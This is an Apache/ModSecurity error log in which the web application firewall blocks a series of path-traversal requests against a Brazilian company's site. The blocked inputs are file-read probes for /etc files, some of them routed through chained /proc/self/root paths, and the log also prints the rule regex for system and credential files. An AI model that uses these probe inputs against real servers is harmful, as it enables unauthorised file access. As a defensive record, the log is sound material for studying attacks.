[Fri Mar 20 10:56:21.634654 2026] [:error] [pid 9818:tid 140411574073088] [client 216.73.216.191:56474] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SBF1pVZ5mVmJwsFNVCgAAAFQ"]
[Fri Mar 20 10:56:23.407378 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:44640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SB_XLqtnMIWvjpaLBAQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:56:39.168044 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.94:57242] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SF11pVZ5mVmJwsFNVHAAAAFA"]
[Fri Mar 20 10:56:49.567446 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:57676] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SIda6ubjKNq_cu4YACQAAA1Y"]
[Fri Mar 20 10:56:51.240336 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.7:57878] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SI11pVZ5mVmJwsFNVLgAAAFE"]
[Fri Mar 20 10:56:52.179958 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:57930] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SJBCii7xarUs8iHaQEwAAAgI"]
[Fri Mar 20 10:56:52.658958 2026] [:error] [pid 21219:tid 140411557287680] [client 216.73.216.191:57958] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SJPXLqtnMIWvjpaLBEgAAApY"]
[Fri Mar 20 10:56:53.311368 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:58010] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SJda6ubjKNq_cu4YACgAAA0k"]
[Fri Mar 20 10:56:53.697377 2026] [:error] [pid 11642:tid 140411691570944] [client 216.73.216.191:58030] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SJbninkcc-iUj5AqDIgAAA4Y"]
[Fri Mar 20 10:56:53.705808 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.29:58034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:56:53.899259 2026] [:error] [pid 21219:tid 140411607643904] [client 216.73.216.191:57972] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SJfXLqtnMIWvjpaLBGAAAApA"]
[Fri Mar 20 10:56:55.967302 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.9:58208] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1SJwF0L0L-SsrnPo6OpAAAAsc"]
[Fri Mar 20 10:56:58.743954 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.121:58388] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1SKta6ubjKNq_cu4YAEgAAA1M"]
[Fri Mar 20 10:56:58.822156 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:58396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SKl1pVZ5mVmJwsFNVNwAAAE8"]
[Fri Mar 20 10:57:02.279638 2026] [:error] [pid 7235:tid 140411557287680] [client 216.73.216.191:58560] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SLvqxLDW4GITHUkQPYwAAARY"]
[Fri Mar 20 10:57:02.287432 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.2:58618] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SLvHIg5MgXLBnicMbtwAAAcg"]
[Fri Mar 20 10:57:03.491920 2026] [:error] [pid 7893:tid 140411557287680] [client 216.73.216.191:58634] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SLxCii7xarUs8iHaQIgAAAhY"]
[Fri Mar 20 10:57:08.115532 2026] [:error] [pid 15826:tid 140411590858496] [client 216.73.216.191:59014] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SNOoXxyEfFpUF8f-l7gAAAVI"]
[Fri Mar 20 10:57:08.419624 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:59048] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SNOoXxyEfFpUF8f-l8AAAAVc"]
[Fri Mar 20 10:57:09.074711 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:59076] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SNbninkcc-iUj5AqDOAAAA5g"]
[Fri Mar 20 10:57:09.508111 2026] [:error] [pid 21219:tid 140411616036608] [client 216.73.216.191:58970] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SNfXLqtnMIWvjpaLBOwAAAo8"]
[Fri Mar 20 10:57:09.512122 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:59110] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SNeoXxyEfFpUF8f-l9gAAAVE"]
[Fri Mar 20 10:57:10.245264 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:41604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SNvXLqtnMIWvjpaLBPwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:10.562613 2026] [:error] [pid 9818:tid 140411699963648] [client 216.73.216.191:59192] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SNl1pVZ5mVmJwsFNVQwAAAEU"]
[Fri Mar 20 10:57:10.759554 2026] [:error] [pid 10189:tid 140411674785536] [client 216.73.216.191:59146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SNjJ3M9BSuKP7CAZK6QAAAIg"]
[Fri Mar 20 10:57:12.347300 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.87:59214] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SN_qxLDW4GITHUkQPcwAAARc"]
[Fri Mar 20 10:57:12.350612 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:56218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SN_qxLDW4GITHUkQPdAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:15.966572 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:59460] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SO9a6ubjKNq_cu4YAKgAAA0Q"]
[Fri Mar 20 10:57:17.615507 2026] [:error] [pid 11167:tid 140411599251200] [client 216.73.216.191:59592] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SPfHIg5MgXLBnicMbxgAAAdE"]
